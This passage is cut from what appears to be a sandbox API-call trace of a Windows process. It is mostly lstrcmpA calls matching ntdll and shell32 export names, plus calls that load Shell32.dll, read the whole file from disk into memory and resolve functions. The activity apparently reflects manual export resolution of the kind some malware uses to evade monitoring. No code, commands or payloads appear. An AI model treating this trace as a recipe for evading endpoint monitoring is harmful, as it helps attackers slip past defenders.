lpString2="A_SHAUpdate") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0246.476] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0246.476] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0246.476] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0246.476] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0246.476] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0246.476] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0246.476] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0246.477] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0246.477] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0246.477] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0246.477] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0246.477] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0246.477] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0246.478] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0246.478] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0246.478] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0246.478] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0246.478] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0246.478] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0246.478] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0246.478] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0246.478] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0246.478] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0246.478] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0246.478] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0246.478] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0246.478] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0246.478] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0246.478] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0246.478] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0246.478] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0246.478] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0246.478] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0246.478] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0246.478] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0246.478] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0246.478] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0246.478] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0246.478] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0246.478] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0246.478] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0246.478] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0246.478] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0246.479] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0246.479] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0246.569] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0246.569] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0246.569] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0246.569] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0246.569] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0246.569] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0246.569] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0246.569] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0246.570] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0246.570] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0246.570] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0246.570] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0246.570] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0246.570] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0246.570] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0246.570] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0246.570] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0246.570] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0246.570] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0246.570] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0246.570] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0246.570] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0246.570] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0246.570] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0246.570] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0246.570] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0246.570] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0246.570] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0249.023] GetProcessHeap () returned 0x4e0000 [0249.024] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x40e5040 | out: hHeap=0x4e0000) returned 1 [0249.030] GetProcessHeap () returned 0x4e0000 [0249.030] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x10) returned 0x4f9360 [0249.030] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0249.030] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0249.030] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0249.031] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0249.031] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0249.031] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0249.031] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0249.031] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0249.031] GetProcessHeap () returned 0x4e0000 [0249.031] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x1587258) returned 0x40ec040 [0249.067] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0249.067] ReadFile (in: hFile=0x140, lpBuffer=0x40ec040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40ec040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0249.522] CloseHandle (hObject=0x140) returned 1 [0249.522] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0249.522] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0249.522] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0249.522] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0249.522] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0249.522] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0249.523] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0249.523] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0249.523] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0249.523] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0249.523] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0249.523] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0249.523] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0249.523] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0249.523] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0249.523] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0249.523] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0249.523] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0249.523] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0249.523] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0249.523] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0249.523] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0249.523] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0249.523] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0249.523] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0249.523] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0249.523] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0249.523] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0249.523] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0249.523] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0249.523] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0249.523] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0249.523] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0249.523] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0249.523] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0249.523] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0249.523] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0249.523] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0249.523] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0249.524] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0249.524] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0249.524] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0249.524] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0249.524] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0249.524] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0249.524] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0249.524] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0249.524] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0249.524] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0249.524] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0249.524] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0249.525] 